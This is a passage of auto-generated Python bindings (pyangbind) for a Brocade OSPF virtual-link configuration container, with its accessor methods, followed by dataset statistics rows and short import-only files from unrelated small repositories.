      self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
      self._extmethods = extmethods
    elif hasattr(self, "_parent"):
      extmethods = getattr(self._parent, "_extmethods", None)
      self._extmethods = extmethods
    else:
      self._extmethods = False

    # Member defaults. dead-interval defaults to 40 and hello-interval to
    # 10 (see the default= arguments); the other leaves start unset.
    self.__retransmit_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between retransmitting lost link state\n advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
    self.__md5_authentication = YANGDynClass(base=md5_authentication.md5_authentication, is_container='container', presence=False, yang_name="md5-authentication", rest_name="md5-authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MD5 authentication parameters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)
    self.__dead_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'3..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(40), is_leaf=True, yang_name="dead-interval", rest_name="dead-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interval after which a neighbor is declared dead'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
    self.__hello_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(10), is_leaf=True, yang_name="hello-interval", rest_name="hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between HELLO packets'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
    self.__authentication_key = YANGDynClass(base=authentication_key.authentication_key, is_container='container', presence=False, yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Authentication password (key)', u'cli-full-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)
    self.__virt_link_neighbor = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="virt-link-neighbor", rest_name="virt-link-neighbor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='inet:ipv4-address', is_config=True)
    self.__transmit_delay = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="transmit-delay", rest_name="transmit-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Link state transmit delay'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)

    # Copy-constructor path: a single positional argument must expose every
    # element of this container; changed elements are copied via the
    # generated _set_* methods (propagating load= when given).
    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)

  def _path(self):
    # YANG data path: parent path + own name, or the absolute path when
    # this object is the root of the instantiated tree.
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return [u'rbridge-id', u'router', u'ospf', u'area', u'virtual-link']

  def _rest_path(self):
    # REST path mirrors _path() but uses rest names (skipping empty ones).
    if hasattr(self, "_parent"):
      if self._rest_name:
        return self._parent._rest_path()+[self._rest_name]
      else:
        return self._parent._rest_path()
    else:
      return [u'rbridge-id', u'router', u'ospf', u'area', u'virtual-link']

  def _get_virt_link_neighbor(self):
    """
    Getter method for virt_link_neighbor, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/virt_link_neighbor (inet:ipv4-address)
    """
    return self.__virt_link_neighbor

  def _set_virt_link_neighbor(self, v, load=False):
    """
    Setter method for virt_link_neighbor, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/virt_link_neighbor (inet:ipv4-address)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_virt_link_neighbor is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_virt_link_neighbor() directly.
    """
    # This leaf is the list key (is_keyval=True): once the object lives
    # inside a list, the key may only be rewritten during a load.
    parent = getattr(self, "_parent", None)
    if parent is not None and load is False:
      raise AttributeError("Cannot set keys directly when" +
        " within an instantiated list")

    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="virt-link-neighbor", rest_name="virt-link-neighbor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='inet:ipv4-address', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """virt_link_neighbor must be of a type compatible with inet:ipv4-address""",
          'defined-type': "inet:ipv4-address",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="virt-link-neighbor", rest_name="virt-link-neighbor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='inet:ipv4-address', is_config=True)""",
        })

    self.__virt_link_neighbor = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_virt_link_neighbor(self):
    # Reset the leaf to a fresh (unset) wrapper.
    self.__virt_link_neighbor = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), is_leaf=True, yang_name="virt-link-neighbor", rest_name="virt-link-neighbor", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='inet:ipv4-address', is_config=True)

  def _get_authentication_key(self):
    """
    Getter method for authentication_key, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/authentication_key (container)
    """
    return self.__authentication_key

  def _set_authentication_key(self, v, load=False):
    """
    Setter method for authentication_key, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/authentication_key (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_authentication_key is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_authentication_key() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=authentication_key.authentication_key, is_container='container', presence=False, yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Authentication password (key)', u'cli-full-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """authentication_key must be of a type compatible with container""",
          'defined-type': "container",
          'generated-type': """YANGDynClass(base=authentication_key.authentication_key, is_container='container', presence=False, yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Authentication password (key)', u'cli-full-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)""",
        })

    self.__authentication_key = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_authentication_key(self):
    # Reset the container to a fresh (unset) wrapper.
    self.__authentication_key = YANGDynClass(base=authentication_key.authentication_key, is_container='container', presence=False, yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Authentication password (key)', u'cli-full-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)

  def _get_dead_interval(self):
    """
    Getter method for dead_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/dead_interval (common-def:time-interval-sec)
    """
    return self.__dead_interval

  def _set_dead_interval(self, v, load=False):
    """
    Setter method for dead_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/dead_interval (common-def:time-interval-sec)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_dead_interval is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_dead_interval() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'3..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(40), is_leaf=True, yang_name="dead-interval", rest_name="dead-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interval after which a neighbor is declared dead'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """dead_interval must be of a type compatible with common-def:time-interval-sec""",
          'defined-type': "common-def:time-interval-sec",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'3..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(40), is_leaf=True, yang_name="dead-interval", rest_name="dead-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interval after which a neighbor is declared dead'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)""",
        })

    self.__dead_interval = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_dead_interval(self):
    # Reset the leaf to its default wrapper (default value 40).
    self.__dead_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'3..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(40), is_leaf=True, yang_name="dead-interval", rest_name="dead-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interval after which a neighbor is declared dead'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)

  def _get_hello_interval(self):
    """
    Getter method for hello_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/hello_interval (common-def:time-interval-sec)
    """
    return self.__hello_interval

  def _set_hello_interval(self, v, load=False):
    """
    Setter method for hello_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/hello_interval (common-def:time-interval-sec)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_hello_interval is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_hello_interval() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(10), is_leaf=True, yang_name="hello-interval", rest_name="hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between HELLO packets'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """hello_interval must be of a type compatible with common-def:time-interval-sec""",
          'defined-type': "common-def:time-interval-sec",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(10), is_leaf=True, yang_name="hello-interval", rest_name="hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between HELLO packets'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)""",
        })

    self.__hello_interval = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_hello_interval(self):
    # Reset the leaf to its default wrapper (default value 10).
    self.__hello_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(10), is_leaf=True, yang_name="hello-interval", rest_name="hello-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between HELLO packets'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)

  def _get_retransmit_interval(self):
    """
    Getter method for retransmit_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/retransmit_interval (common-def:time-interval-sec)
    """
    return self.__retransmit_interval

  def _set_retransmit_interval(self, v, load=False):
    """
    Setter method for retransmit_interval, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/retransmit_interval (common-def:time-interval-sec)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_retransmit_interval is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_retransmit_interval() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between retransmitting lost link state\n advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """retransmit_interval must be of a type compatible with common-def:time-interval-sec""",
          'defined-type': "common-def:time-interval-sec",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between retransmitting lost link state\n advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)""",
        })

    self.__retransmit_interval = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_retransmit_interval(self):
    # Reset the leaf to a fresh (unset) wrapper.
    self.__retransmit_interval = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="retransmit-interval", rest_name="retransmit-interval", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Time between retransmitting lost link state\n advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)

  def _get_transmit_delay(self):
    """
    Getter method for transmit_delay, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/transmit_delay (common-def:time-interval-sec)
    """
    return self.__transmit_delay

  def _set_transmit_delay(self, v, load=False):
    """
    Setter method for transmit_delay, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/transmit_delay (common-def:time-interval-sec)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_transmit_delay is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_transmit_delay() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="transmit-delay", rest_name="transmit-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Link state transmit delay'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """transmit_delay must be of a type compatible with common-def:time-interval-sec""",
          'defined-type': "common-def:time-interval-sec",
          'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="transmit-delay", rest_name="transmit-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Link state transmit delay'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)""",
        })

    self.__transmit_delay = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_transmit_delay(self):
    # Reset the leaf to a fresh (unset) wrapper.
    self.__transmit_delay = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..3600']}), is_leaf=True, yang_name="transmit-delay", rest_name="transmit-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Link state transmit delay'}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='common-def:time-interval-sec', is_config=True)

  def _get_md5_authentication(self):
    """
    Getter method for md5_authentication, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/md5_authentication (container)
    """
    return self.__md5_authentication

  def _set_md5_authentication(self, v, load=False):
    """
    Setter method for md5_authentication, mapped from YANG variable /rbridge_id/router/ospf/area/virtual_link/md5_authentication (container)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_md5_authentication is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_md5_authentication() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=md5_authentication.md5_authentication, is_container='container', presence=False, yang_name="md5-authentication", rest_name="md5-authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MD5 authentication parameters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """md5_authentication must be of a type compatible with container""",
          'defined-type': "container",
          'generated-type': """YANGDynClass(base=md5_authentication.md5_authentication, is_container='container', presence=False, yang_name="md5-authentication", rest_name="md5-authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MD5 authentication parameters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)""",
        })

    self.__md5_authentication = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_md5_authentication(self):
    # Reset the container to a fresh (unset) wrapper.
    self.__md5_authentication = YANGDynClass(base=md5_authentication.md5_authentication, is_container='container', presence=False, yang_name="md5-authentication", rest_name="md5-authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'MD5 authentication parameters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-ospf', defining_module='brocade-ospf', yang_type='container', is_config=True)

  # Public read/write properties wired to the generated accessors
  # (__builtin__.property because 'property' leaves are common in YANG and
  # could shadow the builtin in generated modules).
  virt_link_neighbor = __builtin__.property(_get_virt_link_neighbor, _set_virt_link_neighbor)
  authentication_key = __builtin__.property(_get_authentication_key, _set_authentication_key)
  dead_interval = __builtin__.property(_get_dead_interval, _set_dead_interval)
  hello_interval = __builtin__.property(_get_hello_interval, _set_hello_interval)
  retransmit_interval = __builtin__.property(_get_retransmit_interval, _set_retransmit_interval)
  transmit_delay = __builtin__.property(_get_transmit_delay, _set_transmit_delay)
  md5_authentication = __builtin__.property(_get_md5_authentication, _set_md5_authentication)

  # Element registry consumed by the pyangbind base class (e.g. by the
  # copy-constructor loop in __init__ above).
  _pyangbind_elements = {'virt_link_neighbor': virt_link_neighbor, 'authentication_key': authentication_key, 'dead_interval': dead_interval, 'hello_interval': hello_interval, 'retransmit_interval': retransmit_interval, 'transmit_delay': transmit_delay, 'md5_authentication': md5_authentication, }
| 87.285294
| 752
| 0.743539
| 4,094
| 29,677
| 5.157792
| 0.055203
| 0.03315
| 0.03978
| 0.031824
| 0.857643
| 0.832402
| 0.824872
| 0.816348
| 0.810949
| 0.804887
| 0
| 0.024048
| 0.11022
| 29,677
| 339
| 753
| 87.542773
| 0.775619
| 0.134953
| 0
| 0.457944
| 0
| 0.046729
| 0.401792
| 0.188006
| 0
| 0
| 0
| 0
| 0
| 1
| 0.11215
| false
| 0.018692
| 0.046729
| 0
| 0.275701
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4dc567d79739ebdd5a03cb12cd552429f4022e31
| 120
|
py
|
Python
|
chiki_deploy/__init__.py
|
endsh/chiki-deploy
|
d02ab458b2319629ce11bd1bc604681f61887a9a
|
[
"MIT"
] | null | null | null |
chiki_deploy/__init__.py
|
endsh/chiki-deploy
|
d02ab458b2319629ce11bd1bc604681f61887a9a
|
[
"MIT"
] | null | null | null |
chiki_deploy/__init__.py
|
endsh/chiki-deploy
|
d02ab458b2319629ce11bd1bc604681f61887a9a
|
[
"MIT"
] | null | null | null |
# coding: utf-8
from .front import *
from .nginx import *
from .server import *
from .utils import *
from .web import *
| 17.142857
| 21
| 0.7
| 18
| 120
| 4.666667
| 0.555556
| 0.47619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010309
| 0.191667
| 120
| 6
| 22
| 20
| 0.85567
| 0.108333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1501110dcc378051e8482666938c183d918a535a
| 30
|
py
|
Python
|
pydeepl/__init__.py
|
spandanagella/pydeepl
|
48186685e4bcb4b029ac683bcad575fe0e9654d5
|
[
"MIT"
] | null | null | null |
pydeepl/__init__.py
|
spandanagella/pydeepl
|
48186685e4bcb4b029ac683bcad575fe0e9654d5
|
[
"MIT"
] | null | null | null |
pydeepl/__init__.py
|
spandanagella/pydeepl
|
48186685e4bcb4b029ac683bcad575fe0e9654d5
|
[
"MIT"
] | 1
|
2020-06-04T21:05:57.000Z
|
2020-06-04T21:05:57.000Z
|
from .pydeepl import translate
| 30
| 30
| 0.866667
| 4
| 30
| 6.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 30
| 1
| 30
| 30
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
12913fc271ba713c2d294299a48edacbdbf5a74e
| 147
|
py
|
Python
|
tools/main/process/Validators/__init__.py
|
hidura/sugelico
|
d3c76f358a788d5f3a891cf0a7dd7420ac3a7845
|
[
"MIT"
] | null | null | null |
tools/main/process/Validators/__init__.py
|
hidura/sugelico
|
d3c76f358a788d5f3a891cf0a7dd7420ac3a7845
|
[
"MIT"
] | null | null | null |
tools/main/process/Validators/__init__.py
|
hidura/sugelico
|
d3c76f358a788d5f3a891cf0a7dd7420ac3a7845
|
[
"MIT"
] | null | null | null |
from tools.main.process.Validators.Login import ValidLogin
from tools.main.process.Validators.Commerce import ValidCommerce
__author__ = 'hidura'
| 29.4
| 64
| 0.843537
| 18
| 147
| 6.666667
| 0.666667
| 0.15
| 0.216667
| 0.333333
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 147
| 4
| 65
| 36.75
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0.040816
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
12ab1902dc9ec092bf67a58d8cbae8bc33396fcc
| 25
|
py
|
Python
|
recognition/ocr/psenet/model/__init__.py
|
kalenforn/MMVA
|
1e4ec5417d4497a14f226fab8a66fe065a9f0f65
|
[
"MIT"
] | 4
|
2021-12-16T08:17:49.000Z
|
2022-03-12T10:14:50.000Z
|
recognition/ocr/psenet/model/__init__.py
|
kalenforn/video-content-clean
|
4b6e572ec034fbe2e668c250cff8e1c9a13dd0e0
|
[
"MIT"
] | null | null | null |
recognition/ocr/psenet/model/__init__.py
|
kalenforn/video-content-clean
|
4b6e572ec034fbe2e668c250cff8e1c9a13dd0e0
|
[
"MIT"
] | 1
|
2021-12-14T08:17:41.000Z
|
2021-12-14T08:17:41.000Z
|
